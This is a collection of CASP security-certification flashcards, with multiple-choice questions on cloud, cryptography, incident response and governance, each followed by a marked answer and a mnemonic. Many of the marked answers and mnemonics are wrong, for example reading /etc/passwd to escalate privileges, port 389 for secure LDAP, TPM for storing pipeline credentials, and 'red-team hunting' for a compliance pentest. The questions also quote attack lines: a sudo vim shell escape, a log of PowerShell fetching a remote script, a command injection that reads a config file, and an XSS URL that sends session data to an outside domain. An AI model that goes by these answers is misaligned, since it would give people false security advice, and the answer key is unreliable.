CASP Flashcards
A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure. The Chief information Security Officer asks the security engineer to design connectivity to meet the following requirements:
- Only users with corporate-owned devices can directly access servers hosted by the cloud provider.
- The company can control what SaaS applications each individual user can access.
- User browser activity can be monitored.
Which of the following solutions would BEST meet these requirements?
A. IAM gateway, MDM, and reverse proxy
B. VPN, CASB, and secure web gateway
C. SSL tunnel, DLP, and host-based firewall.
D. API gateway, UEM, and forward proxy
B. VPN, CASB, and secure web gateway
VPN
During a system penetration test, a security engineer successfully gained access to a shell on a Linux host as a standard user and wants to elevate the privilege levels. Which of the following is a valid Linux post-exploitation method to use to accomplish this goal?
A. Spawn a shell using sudo and an escape string such as sudo vim -c ‘!sh’.
B. Perform ASIC password cracking on the host
C. Read the /etc/passwd file to extract the usernames.
D. Initiate unquoted service path exploits.
E. Use the UNION operator to extract the database schema.
C. Read the /etc/passwd file to extract the usernames.
/etc/passwd
A systems administrator is in the process of hardening the host systems before connecting to the network. The administrator wants to add protection to the boot loader to ensure the hosts are secure before the OS fully boots.
Which of the following would provide the BEST boot loader protection?
A. TPM
B. HSM
C. PKI
D. UEFI/BIOS
D. UEFI/BIOS
UEFI/BIOS
A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks. Which of the following would be the BEST solution against this type of attack?
A. Cookies
B. Wildcard certificates
C. HSTS
D. Certificate pinning
D. Certificate pinning
A threat hunting team receives a report about possible APT activity in the network. Which of the following threat management frameworks should the team implement?
A. NIST SP 800-53
B. MITRE ATT&CK
C. The Cyber Kill Chain
D. The Diamond Model of Intrusion Analysis
A. NIST SP 800-53
NIST
Device event logs sources from MDM software as follows:
Device - ANDROID_1022 Date/Time - 01JAN21 0255 Location - 39N, 77W Event - Push Description - Application 1220 Install Queued
Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs?
A. Malicious installation of an application; change the MDM configuration to remove application ID 1220.
B. Resource leak; recover the device for analysis and clean up the local storage.
C. Impossible travel; disable the device’s account and access while investigating.
D. Falsified status reporting; remotely wipe the device.
A. Malicious installation of an application; change the MDM configuration to remove application ID 1220.
Install
An energy company is required to report the average pressure of natural gas used over the past quarter. A PLC sends data to a historian server that creates the required reports.
Which of the following historian server locations will allow the business to get he required reports in an OT and IT environment?
A. In the OT environment, use a VPN from the IT environment into the OT environment.
B. In the OT environment, allow IT traffic into the OT environment.
C. In the IT environment, allow PLC’s to send data from the OT environment to the IT environment.
D. Use a screened subnet between the OT and IT environments.
A. In the OT environment, use a VPN from the IT environment into the OT environment.
VPN
Which of the following is a benefit of using steganalysis techniques in forensic response?
A. Breaking a symmetric cipher used in secure voice communications.
B. Determining the frequency of unique attacks against DRM-protected media.
C. Maintaining chain of custody for acquired evidence.
D. Identifying least significant bit encoding of data in a .wav file.
D. Identifying least significant bit encoding of data in a .wav file.
WAV file
A new web server must comply with new secure-by-design priciples and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server configuration:
TLS_AES_256_GCM_SHA384 TLS_CHACHA20_POLY1305_SHA256 TLS_AES_128_GCM_SHA256 TLS_AES_128_CCM_8_SHA256 TLS_RSA_WITH_AES_128_CBC_SHA256 TLS_DHE-DSS_WITH_RC4_128_SHA RSA_WITH_AES_128_CCM
Which of the following ciphers should the security analyst remove to support the business requirements?
A. TLS_AES_128_CCM_8_SHA256
B. TLS_DHE_DSS_WITH_RC4_128_SHA
C. TLS_CHACHA20_POLY1305_SHA256
D. TLS_AES_128_GCM_SHA256
C. TLS_CHACHA20_POLY1305_SHA256.
Poly
A security analyst notices a number of SIEM events that show the following activity:
10/30/2020
- 168.1.1 - sc stop WinDefend
- 168.1.2 - c:\program files\games\comptiacasp.exe
- 168.1.1 - c:\windows\system32\cmd.exe /c powershell https://content.comptia.com/content.exam.ps1
- 168.1.1 - powershell –> 40.90.23.154:443
Which of the following response actions should the analyst take FIRST?
A. Disable powershell.exe on all Microsoft Windows endpoints.
B. Restart Microsoft Windows Defender.
C. Configure the forward proxy to block 40.90.23.154.
D. Disable local administrator privileges on the endpoints.
A. Disable powershell.exe on all Microsoft Windows endpoints.
powershell
A company hired a third party to develop software as part of its strategy to be quicker to market. The company’s policy outlines the following requirements:
- The credentials used to publish production software to the container registry should be stored in a secure location.
- Access should be restricted to the pipeline service account, without the ability for the third-party developer to read the credentials directly.
Which of the following would be the BEST recommendation for storing and monitoring access to these shared credentials?
A. TPM
B. Local secure password file
C. MFA
D. Key vault
A. TPM
Storing shared credentials - TPM
A junior developer is informed about the impact of new malware on an Advanced RISC Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to insert itself in another process memory location.
Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware?
A. Execute never
B. No-execute
C. Total memory encryption
D. Virtual memory encryption
A. Execute never
ARM never
A company is implementing SSL inspection. During the next six months, multiple web applications that will be separated out with subdomains will be deployed. Which of the following will allow the inspection of the data without multiple certificate deployments?
A. Include all available cipher suites.
B. Create a wildcard certificate.
C. Use a third-party CA
D. Implement certificate pinning.
D. Implement certificate pinning.
pinning prevents multiple certificate deployments
A small business requires a low-cost approach to theft detection for the audio recordings it produces and sells. Which of the following techniques will MOST likely meet the business’s needs?
A. Performing deep-packet inspection of all digital audio files.
B. Adding identifying filesystem metadata to the digital audio files.
C. Implementing steganography
D. Purchasing and installing DRM suite.
C. Implementing steganography
Steganography for all things audio. Cheaper than DRM.
Clients are reporting slowness when attempting to access a series of load-balanced APIs that do not require authentication. The servers that host the APIs are showing heavy CPU utilization. No alerts are found on the WAFs sitting in front of the APIs.
Which of the following should a security engineer recommend to BEST remedy the performance issues in a timely manner?
A. Implement rate limiting on the API.
B. Implement geoblocking on the WAF.
C. Implement OAuth 2.0 on the API.
D. Implement input validation on the API.
C. Implement OAuth 2.0 on the API.
API’s do not require authorization - OAuth
An organization is considering a BYOD standard to support remote working. The first iteration of the solution will utilize only approved collaboration applications and the ability to move corporate data between those applications. The security team has concerns about the following:
- Unstructured data being exfiltrated after an employee leaves the organization.
- Data being exfiltrated as a result of compromised credentials.
- Sensitive information in emails being exfiltrated.
Which of the following solutions should the security team implement to mitigate the risk of data loss?
A. Mobile device management, remote wipe, and data loss detection.
B. Conditional access, DoH, and full disk encryption.
C. Mobile application management, MFA, and DRM
D. Certificates, DLP, geofencing
A. Mobile device management, remote wipe, and data loss detection.
BYOD - Mobile device management and remote wipe
A Chief Information Officer is considering migrating all company data to the cloud to save money on expensive SAN storage. Which of the following is a security concern that will MOST likely need to be addressed during migration?
A. Latency
B. Data exposure
C. Data loss
D. Data dispersion
A. Latency
On-prem SAN is quicker than off-prem cloud storage.
Due to locality and budget constraints, an organization’s satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and eternal resources while not sacrificing threat visibility. Which of the following would be the BEST option to implement?
A. Distributed connection allocation
B. Local caching
C. Content delivery network
D. SD-WAN vertical heterogeneity
C. Content delivery network
A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O0 on the disk drive.
PID 83 - IO 304023 PID 65 - IO 300 PID 87 - IO 400020 PID 77 - IO 10 PID 85 - IO 0
A. 65
B. 77
C. 83
D. 87
D. 87
Pick the PID with the highest IO.
Which of the following are risks associated with vendor lock-in? (Choose two.)
A. The client can seamlessly move data.
B. The vendor can change product offerings.
C. The client receives a sufficient level of service.
D. The client experiences decreased quality of service.
E. The client can leverage a multicloud approach.
F. The client experiences increased interoperability.
B and D.
B - The vendor can change product offerings.
D - The client experiences decreased quality of service.
Think “what would Juniper do?”
An organization recently experienced a ransomware attack. The security team leader is concerned about the attack reoccurring. However, no further security measures have been implemented. Which of the following processes can be used to identify potential prevention recommendations?
A. Detection
B. Remediation
C. Preparation
D. Recovery
A. Detection
Detection the first step towards prevention.
A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks. Which of the following sources could the architect consult to address this security concern?
A. SDLC
B. OVAL
C. IEEE
D. OWASP
B. OVAL
Open Vulnerability and Assessment Language
A security engineer was auditing an organization’s current software development practice and discovered that multiple open-source libraries were integrated into the organization’s software.
The organization currently performs SAST and DAST on the software it develops.
Which of the following should the organization incorporate into the SDLC to ensure the security of the open-source libraries?
A. Perform additional SAST/DAST on the open-source libraries.
B. Implement the SDLC security guidelines.
C. Track the library versions and monitor the CVE website for related vulnerabilities.
D. Perform unit testing of the open-source libraries.
B. Implement the SDLC security guidelines.
SDLC to SDLC
A security analyst is investigating a possible buffer overflow attack. The following output was found on a user’s workstation:
graphic.linux_randomization.prg
Which of the following technologies would mitigate the manipulation of memory segments?
A. NX bit
B. ASLR
C. DEP
D. HSM
B. ASLR
Address Space Layout Randomization prevents buffer overflow
An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During the last two holiday seasons, the server experienced performance issues because of too many connections, and several customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this kind of performance issue. Which of the following is the MOST cost-effective solutions?
A. Move the server to a cloud provider.
B. Change the operating system.
C. Buy a new server and create and active-active cluster.
D. Upgrade the server with a new one.
A. Move the server to a cloud provider.
A company has decided to purchase a license for software that is used to operate a mission-critical process. The third-party developer is new to the industry but is delivering what the company needs at this time.
Which of the following BEST describes the reason why utilizing a source code escrow will reduce the operational risk to the company if the third party stops supporting the application?
A. The company will have access to the latest version to continue development.
B. The company will be able to force the third-pary developer to continue support.
C. The company will be able to manage the third-party developer’s development process.
D. The company will be paid by the third-party developer to hire a new development team.
B. The company will be able to force the third-party developer to continue support.
Tricky question. While A is true, B is the best answer. Look for FORCE.
A security analyst is researching containerization concepts for an organization. The analyst is concerned about potential resource exhaustion scenarios on the Docker host due to a single application that is overconsuming available resources. Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers?
A. Union filesystem overlay
B. Cgroups
C. Linux namespaces
D. Device mapper
B. Cgroups
Containers - Cgroups
A developer wants to maintain integrity to each module of a program and ensure the code cannot be altered by malicious users. Which of the following would be BEST for the developer to perform? (Choose two.)
A. Utilize code signing by a trusted third party.
B. Implement certificate-based authentication.
C. Verify MD5 hashes.
D. Compress the program with a password.
E. Encrypt with 3DES.
F. Make the DACL read-only.
A and B.
A. Utilize code signing by a trusted third party.
B. Implement certificate-based authentication.
Code and Certificate
A company is moving most of its customer-facing production systems to the cloud-facing production systems to the cloud. IaaS is the service model being used. The Chief Executive Officer is concerned about the type of encryption available and requires the solution must have the highest level of security.
Which of the following encryption methods should the cloud security engineer select during the implementation phase?
A. Instance-based
B. Storage-based
C. Proxy-based
D. Array controller-based
A. Instance-based
A vulnerability analyst identified a zero-day vulnerability in a company’s internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one. Which of the following would be BEST suited to meet these requirements?
A. ARF
B. ISACs
C. Node.js
D. OVAL
D. OVAL
Open Vulnerability and Assessment Language
An organization recently started processing, transmitting, and storing its customers’ credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers’ information.
Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?
A. NIST
B. GDPR
C. PCI DSS
D. ISO
C. PCI DSS
Payment Card Industry Data Security Standard
Which of the following is the MOST important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output?
A. Importing the availability of messages.
B. Ensuring non-repudiation of messages.
C. Enforcing protocol conformance for messages.
D. Assuring the integrity messages.
D. Assuring the integrity of messages.
INTEGRITY
A company wants to protect its intellectual property from theft. The company has already applied ACLs and DACs.
Which of the following should the company use to prevent data theft?
A. Watermarking
B. DRM
C. NDA
D. Access Logging
D. Access Logging
A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high-latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.
Which of the following techniques would be BEST suited for this requirement?
A. Deploy SOAR utilities and runbooks.
B. Replace the associated hardware.
C. Provide the contractors with direct access to satellite telemetry data.
D. Reduce link latency on the affected ground and satellite segments.
A. Deploy SOAR utilities and runbooks.
Security Operation, Automation, and Response
A company processes data subject to NDAs with partners that define the processing and storage constraints for the covered data. The agreements currently do not permit moving the covered data to the cloud, and the company would like to renegotiate the terms of the agreements. Which of the following would MOST likely help the company gain consensus to move the data to the cloud?
A. Designing data protection schemes to mitigate the risk of loss due to multitenancy.
B. Implementing redundant stores and services across diverse CSPs for high availability.
C. Emulating OS and hardware architectures to blur operations from CSP view.
D. Purchasing managed FIM services to alert on detected modifications to covered data.
A. Designing data protection schemes to mitigate the risk of loss due multitenancy.
MULTITENANCY
Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours. Based on RPO requirements, which of the following recommendations should the management team make?
A. Leave the current backup schedule intact and pay the ransom to decrypt the data.
B. Leave the current backup schedule intact and make the human resources fileshare read-only.
C. Increase the frequency of backups and SIEM alerts for IOCs.
D. Decrease the frequency of backups and pay the ransom to decrypt the data.
C. Increase the frequency of backups and SIEM alerts for IOCs.
Only answer that makes sense. INCREASE frequency of backups.
A company undergoing digital transformation is reviewing the resiliency of a CSP and is concerned about meeting SLA requirements in the event of a CSP incident. Which of the following would be BEST to proceed with the transformation?
A. An on-premises solution as a backup
B. A load balancer with a round-robin configuration.
C. A multicloud provider solution
D. An active-active solution within the same tenant.
D. An active-active solution within the same tenant.
ACTIVE-ACTIVE
A company has hired a security architect to address several service outages on the endpoints due to new malware. The Chief Executive Officer’s laptop was impacted while working from home. The goal is to prevent further endpoint disruption. The edge network is protected by a web proxy. Which of the following solutions should the security architect recommend?
A. Replace the current antivirus with an EDR solution.
B. Remove the web proxy and install a UTM appliance.
C. Implement a deny list feature on the endpoints.
D. Add a firewall module on the current antivirus solution.
C. Implement a deny list feature on the endpoints.
IMPLEMENT
All staff at a company have started working remotely due to a global pandemic. To transition to remote work, the company has migrated to SaaS collaboration tools. The human resources department wants to use these tools to process sensitive information but is concerned the data could be:
- Leaked to the media via printing of the documents.
- Sent to a personal email address.
- Accessed and viewed by systems administrators.
- Uploaded to file storage site.
Which of the following would mitigate the department’s concerns?
A. Data loss detection, reverse proxy, EDR, and PGP
B. VDI, proxy, CASB, DRM
C. Watermarking, forward proxy, DLP, and MFA
D. Proxy, secure VPN, endpoint encryption, and AV
B. VDI, proxy, CASB, DRM
VDI
A home automation company just purchased and installed tools for its SOC to enable incident identification and response on software the company develops. The company would like to prioritize defenses against the following attack scenarios:
- Unauthorized insertions into application development environments.
- Authorized insiders making unauthorized changes to environment configurations.
Which of the following actions will enable the data feeds needed to detect these types of attacks on development environments? (Choose two.)
A. Perform static code analysis of committed code and generate summary reports.
B. Implement an XML gateway and monitor for violations.
C. Monitor dependency management tools and report on susceptible third-party libraries.
D. Install an IDS on the development subnet and passively monitor for vulnerable services.
E. Model user behavior and monitor for deviations from normal.
F. Continuously monitor code commits to repositories and generate summary logs.
C and D.
C. Monitor dependency management tools and report on susceptible third-party libraries.
D. Install an IDS on the development subnet and passively monitor for vulnerable services.
MONITOR and INSTALL
An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key. Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string?
A. Implement a VPN for all APIs.
B. Sign the key with DSA.
C. Deploy MFA for the service accounts.
D. Utilize HMAC for the keys.
D. Utilize HMAC for the keys
Hash Message Authentication Code
An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server. Attempts to reproduce the error are confirmed, and clients are reporting the following:
ERR_SSL_VERSION_OR_CIPHER_MISMATCH
Which of the following is MOST likely the root cause?
A. The client application is testing PFS.
B. The client application is configured to use ECDHE.
C. The client application is configured to use RC4.
D. The client application is configured to use AES-256 in GCM
C. The client application is configured to use RC4.
App is using old RC4.
An organization is designing a network architecture that must meet the following requirements:
-Users will only be able to access predefined services.
-Each user will have a unique allow list defined for access.
-The system will construct one-to-one subject/object access paths dynamically.
Which of the following architectural designs should the organization use to meet these requirements?
A. Peer-to-peer secure communications enabled by mobile applications.
B. Proxied application data connections enabled by API gateways.
C. Microsegmentation enabled by software-defined-networking.
D. VLANs enable by network infrastructure devices.
C. Microsegmentation enabled by software-defined-networking.
SDN for one-to-one dynamic access paths.
A company’s claims processed department has a mobile workforce that receives a large number of email submissions from personal email addresses. An employee recently received an email that appeared to be a claim form, but it installed malicious software on the employee’s laptop when was opened.
A. Implement application whitelisting and add only the email client to the whitelist for laptop in the claims processing department.
B. Require all laptops to connect to the VPN before accessing email.
C. Implement cloud-based content filtering with sandboxing capabilities.
D. Install a mail gateway to scan incoming messages and strip attachments before they reach the mailbox.
C. Implement cloud-based content filtering with sandboxing capabilities.
SANDBOXING, like WildFire.
A company suspects a web server may have been infiltrated by a rival corporation. The security engineer reviews the web server logs and finds the following:
ls -l -a /usr/heinz/public; cat ./config/db.yml
The security engineer looks at the code with a developer, and they determine the log entry is created when the following line is run:
system (“ls -l -a #{path}”)
Which of the following is an appropriate security control the company should implement?
A. Restrict directory permission to read-only access.
B. Use server-side processing to avoid XSS vulnerabilities in path input.
C. Separate the items in the system call to prevent command injection.
D. Parameterize a query in the path variable to prevent SQL injection.
C. Separate the items in the system call to prevent command injection.
COMMAND INJECTION
A company that uses AD is migrating services from LDAP to secure LDAP. During the pilot phase, services are not connecting properly to secure LDAP. Block is an except of output from the troubleshooting session:
openssl s_client -host dap.comptia.com -port 636 CONNECTED Begin Certificate End Certificate Subject=/CN-*.comptia.com Issues-/DC-com/DC-danville/CN-chicago
Which of the following BEST explains why secure LDAP is not working? (Select TWO.)
A. The clients may not trust ldap by default.
B. The secure LDAP service is not started, so no connections can be made.
C. Danville.com is under a DDoS-inator ttack and cannot respond to OCSP requests.
D. Secure LDAP should be running on UDP rather than TCP.
E. The company is using the wrong port. It should be using port 389 for secure LDAP.
F. Secure LDAP does not support wildcard certificates.
G. The clients may not trust Chicago by default.
B and E.
B. The secure LDAP service is not started, so no connections can be made.
E. The company is using the wrong port. It should be using port 389 for secure LDAP.
Start the service and use the right port.
A threat analyst notices the following URL while going through the HTTP logs.
http://www.safebrowsing~~~/search.asp?q=x=newimage;x.src=”http://baddomain~~~/session;
Which of the following attack types is the threat analyst seeing?
A. SQL injection
B. CSRF
C. Session Hijacking
D. XSS
D. XSS
Cross-Site Scripting
The Chief Information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties. Which of the following should be implemented to BEST manage the risk?
A. Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier’s post-contract renewal with a dedicated risk management team.
B. Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a database for all other business units and risk teams to reference.
C. Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data. Review all design and operational controls based on best practice standard and report the finding back to upper management.
D. Establish a governance program that rates suppliers based on their access to data, they type of data, and how they access the data. Assign key controls that are received and managed based on the supplier’s rating. Report finding units that rely on the suppliers and the various risk teams.
A. Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier’s post-contract renewal with a dedicated risk management team.
ESTABLISH A REVIEW COMMITTEE
Company A is establishing a contractual with Company B. The terms of the agreement are formalized in a document covering the payment terms, limitation of liability, and intellectual property rights. Which of the following documents will MOST likely contain these elements.
A. Company A-B SLA v2.docx B. Company A OLA v1b.docx C. Company A MSA v3.docx D. Company A MOUT v1.docx E. Company A-B NDA v03.docx
A. Company A-B SLA v2.docx
SLA
A company requires a task to be carried out by more than one person concurrently. This is an example of:
A. Separation of duties
B. Dual control
C. Least privilege
D. Job rotation
A. Separation of duties
A health company has reached the physical and computing capabilities in its datacenter, but the computing demand continues to increase. The infrastructure is fully virtualized and runs custom and commercial healthcare application that process sensitive health and payment information. Which of the following should the company implement to ensure it can meet the computing demand while complying with healthcare standard for virtualization and cloud computing?
A. Hybrid IaaS solution in a single-tenency cloud
B. Pass solution in a multi-tenency cloud
C. SaaS solution in a community cloud
D. Private SaaS solution in a single tenancy cloud
D. Private SaaS solution in a single tenancy cloud.
PRIVATE
A cybersecurity analyst created the following tables to help determine the maximum budget amount the business can justify spending on an improved email filtering system:
Which of the following meets the budget needs of the business?
ABC - $18,000
XYZ - $16,000
GHI - $22,000
TUV - $19,000
A. Filter ABC
B. Filter XYZ
C. Filter GHI
D. Filter TUV
C. Filter GHI
Maximum budget. Pick the highest number, GHI / $22,000.
Ann, a CIRT member, is conducting incident response activities on a network that consists of several hundred virtual servers and thousands of endpoints and users. The network generates more than 10,000 log messages per second. The enterprise belongs to a large, web-based cryptocurrency startup. Ann has distilled the relevant information into an easily digestible report fo executive management. However, she still needs to collect evidence of the intrusion that caused the incident.
Which of the following should Ann use to gather the required information?
A. Traffic interceptor log analysis
B. Log reduction and visualization tools
C. Proof of work analysis
D. ledger analysis software
B. Log reduction and visualization tools
log REDUCTION
A security engineer is troubleshooting an issue in which an employee is getting an IP address in the range on the wired network. The engineer plus another PC into the same port, and that PC gets an IP address in the correct range. The engineer then puts the employee’s PC on the wireless network and finds the PC still does not get an IP address in the proper range. The PC is up to date on all software and antivirus definitions, and the IP address is not an APIPA address. Which of the following is MOST likely the problem?
A. The company is using 802.1x for VLAN assignment, and the user or computer is in the wrong group.
B. The DHCP server has a reservation for the PC’s MAC address for the wired interface.
C. The WiFi network is using WPA2 Enterprise, and the computer certificate has the wrong IP address in the SAN field.
D. The DHCP server is unavailable, so no IP address is being sent back to the PC.
A. The company is using 802.1x for VLAN assignment, and the user or computer is in the wrong group.
802.1x
Immediately following the report of a potential breach, a security engineer creates a forensic image of the server in question as part of the organization incident response procedure. Which of these must occur to ensure the integrity of the image?
A. The image must be password protected against changes.
B. A hash value of the image must be computed.
C. The disk containing the image must be placed in a sealed container.
D. A duplicate copy of the image must be maintained.
B. A hash value of the image must be computed.
HASH
A company in the financial sector receives a substantial number of customer transaction requests via email. While doing a root-cause analysis conceding a security breach, the CIRT correlates and unusual spike in port 80 traffic from the IP address of a desktop used by a customer relations employee who has access to several of the compromised accounts. Subsequent antivirus scans of the device do not return findings, but the CIRT finds undocumented services running on the device. Which of the following controls would reduce the discovery time for similar in the future.
A. Implementing application blacklisting
B. Configuring the mail to quarantine incoming attachment automatically.
C. Deploying host-based firewalls and shipping the logs to the SIEM.
D. Increasing the cadence for antivirus DAT updates to twice daily.
C. Deploying host-based firewalls and shipping the logs to the SIEM
Host-based Firewall
A system administrator at a medical imaging company discovers protected health information (PHI) on a general-purpose file server. Which of the following steps should the administrator take NEXT?
A. Isolate all of the PHI on its own VLAN and keep it segregated at Layer 2.
B. Take an MD5 hash of the server.
C. Delete all PHI from the network until the legal department is consulted.
D. Consult the legal department to determine the legal requirements.
A. Isolate all of the PHI on its own VLAN nd keep it segregated at layer 2.
VLAN
A security analyst is reading the results of successful exploit that was recently conducted by third-party penetration testers. The testers reverse engineered a privileged executable. In the report, the planning and execution of the xploit is detailed using logs and outputs from the test. However, the attack vector of the exploit is missing, making it harder to recommend remediation’s. Given the following output:
A. A TOC/TOU vulnerability
B. A plain-text password disclosure
C. An integer overflow vulnerability
D. A buffer overflow vulnerability
A. A TOC/TOU vulnerability
TOC/TOU
A financial institution has several systems that currently employ the following controls:
- The servers follow a monthly patching cycle.
- All changes must go through a change management process.
- Developers and systems administrators must log into a jumpbox to access the servers hosting the data using two-factor authentication.
- The servers are on an isolated VLAN and cannot be directly accessed from the internal production network.
An outage recently occurred and lasted several days due to an upgrade that circumvented the approval process. Once the security team discovered an unauthorized patch was installed, they were able to resume operations within an hour. Which of the following should the security administrator recommend to reduce the time to resolution if a similar incident occurs in the future?
A. Require more than one approver for all change management requests.
B. Implement file integrity monitoring with automated alerts on the servers.
C. Disable automatic patch update capabilities on the servers.
D. Enhanced audit logging on the jump servers and ship the logs to the SIEM.
B. Implement file integrity monitoring with automated alerts on the servers.
IMPLEMENT file integrity
Over the last 90 days, many storage services have been exposed in the cloud services environments, and the security team does not have the ability to see what is creating these instances. Shadow IT is creating data services and instances faster than the small security team can keep up with them. The Chief Information security Officer (CIASO) has asked the security officer (CISO) has asked the security lead architect to architect to recommend solutions to this problem. Which of the following BEST addresses the problem with the least amount of administrative effort?
A. Compile a list of firewall requests and compare than against interesting cloud services.
B. Implement a CASB solution and track cloud service use cases for greater visibility.
C. Implement a user-behavior system to associate user events and cloud service creation events.
D. Capture all logs and feed them to a SIEM and then for cloud service events.
C. Implement a user-behavior system to associate user events and cloud service creation events.
IMPLEMENT USER
An analyst executes a vulnerability scan against an internet-facing DNS server and receives the following report:
- Vulnerabilities in Kernel-Mode Driver Could Allow Elevation of Privilege
- SSL Medium Strength Cipher Suites Supported
- Vulnerability in DN Resolution Could Allow Remote Code Execution
- SMB Host SIDs allows Local User Enumeration
Which of the following tools should the analyst use FIRST to validate the most critical vulnerability?
A. Password cracker
B. Port scanner
C. Account enumerator
D. Exploitation framework
A. Password cracker
Internet facing - Password Cracker
The Chief Information Officer (CIO) wants to establish a non-banding agreement with a third party that outlines the objectives of the mutual arrangement dealing with data transfers between both organizations before establishing a formal partnership.
Which of the following would MOST likely be used?
A. MOU
B. OLA
C. NDA
D. SLA
A. MOU
Memorandum of Understanding.
Like SDN Zone D to OSS Zone C
A security analyst is trying to identify the source of a recent data loss incident. The analyst has reviewed all the identified assets on the network at the time of the data loss. The analyst suspects the key to finding the source was obfuscated in an application. Which of the following tools should the analyst use NEXT?
A. Software Decompiler
B. Network Enumerator
C. Log reduction and analysi tool
D. Static code analysis
D. Static code analysis
Obfuscation - Static Code Analysis
Which of the following controls primarily detects abuse of privilege but does not prevent it?
A. Off-boarding
B. Separation of duties
C. Least privilege
D. Job rotation
A. Off-boarding
Not sure this is correct.
A company provides guest WiFi access to the internet and physically separates the guest network from the company’s internal WiFi, the company plans to configure WPA2 Enterprise in an EAP-TLS configuration. Which of the following must be installed on authorized hosts for this new configuration to work properly?
A. Active Directory OPOs
B. PKI certificates
C. Host-based firewall
D. NAC persistent agent
B. PKI Certificates
TLS requires certs…
The goal of a Chief Information Security Officer (CISO) providing up-to-date metrics to a bank’s risk committee is to ensure:
A. Budgeting for cybersecurity increases year over year.
B. The committee knows how much work is being done.
C. Business units are responsible for their own mitigation.
D. The bank is aware of the status of cybersecurity risks.
A. Budgeting for cybersecurity increases year over year.
CISO cares about BUDGET
A cybersecurity engineer analyst scans a system for vulnerabilities. The tool created an OVAL results document as output. Which of the following would enable the engineer to interpret the results in a human readable form? (Select TWO.)
A. Text editor B. OOXML editor C. Event Viewer D. XML style sheet E. SCAP tool F. Debugging utility
A and E.
A. Text editor
E. SCAP tool
TEXT and SCAP reads OVAL
A Chief Information Security Officer (CISO) is developing corrective-action plans based on the following from a vulnerability scan of internal hosts:
High finding, Summary, and Impact.
Which of the following is the MOST appropriate corrective action to document for this finding?
A. The product owner should perform a business impact assessment regarding the ability to implement a WAF.
B. The application developer should use a static code analysis tool to ensure any application code is not vulnerable to buffer overflows.
C. The system administrator should evaluate dependencies and perform upgrades as necessary.
D. The security operations center should develop a custom IDS rule to prevent attacks buffer overflows against this server.
A. The product owner should perform a business impact assessment regarding the ability to implement a WAF.
Web Application Firewall
The Chief Information Security Officer (CISO) of a small local bank has a compliance requirement that a third-party penetration test of the core banking application must be conducted annually. Which of the following services would fulfil the compliance requirement with the LOWEST resource usage?
A. Black-box testing B. gray-box testing C. Red-team hunting D. White-box testing E. Blue-team exercises
C. Red-team hunting
HUNT for RED October
Red team is offense, blue team is defense. Box testing is irrelevant to this scenario.
An application developer is including third-party background security fixes in an application. The fixes seem to resolve a currently identified security issue. However, when the application is released to the public, a report came in that a previous vulnerability has returned. Which of the following should the developer integrate into the process to BEST prevent this type of behavior?
A. Peer review
B. Regression testing
C. User acceptance
D. Dynamic analysis
A. Peer Review
A company’s employees are not permitted to access company systems while travelling internationally. The company email system is configured to block logins based on geographic location, but some employees report their mobile phones continue to sync email while travelling. Which of the following is the MOST likely explanation? (Select TWO.)
A. Outdated escalation attack B. Privilege escalation attack C. VPN on the mobile device D. Unrestricted email administrator accounts E. Chief use of UDP protocols F. Disabled GPS on mobile devices
C and F.
C. VPN on the mobile device
F. Disabled GPS on mobile devices
The usual tricks to get around region blocked services (streaming, sportsbooks, etc)
A Chief Information Security Officer (CISO) has launched to create a BCP/DR plan for the entire company. As part of the initiative, the security team must gather data supporting operational importance for the applications used by the business and determine the order in which the application must be back online. Which of the following be the FIRST step taken by the team?
A. Perform a review of all policies and procedures related to BGP and DR and create an educational module that can be assigned to employees to provide BCP/DR events.
B. Create an SLA for each application that states when the application will come back online and distribute this information to the business units.
C. Have each business unit conduct a BIA and categorize the application according to the cumulative data gathered.
D. Implement replication of all servers nd application data to back up datacenters that are geographically from the central datacenter and release an updated BPA to all clients.
C. Have each business unit conduct a BIA and categorize the application according to the cumulative data gathered.
BIA - Business Impact Analysis
BCP - Business Continuity Planning
DR - Disaster Recovery
Match each finding to each host:
1 - A natural disaster may disrupt operations at Site A, which would then cause an evacuation. Users are unable to log into the domain from their workstations after relocated to Site B.
2 - A natural disaster may disrupt operations at Site A, which would then cause the pump room at Site B to become inoperable.
3 - A natural disaster may disrupt operations at Site A, which would then cause unreliable Internet connectivity at Site B due to route flapping.
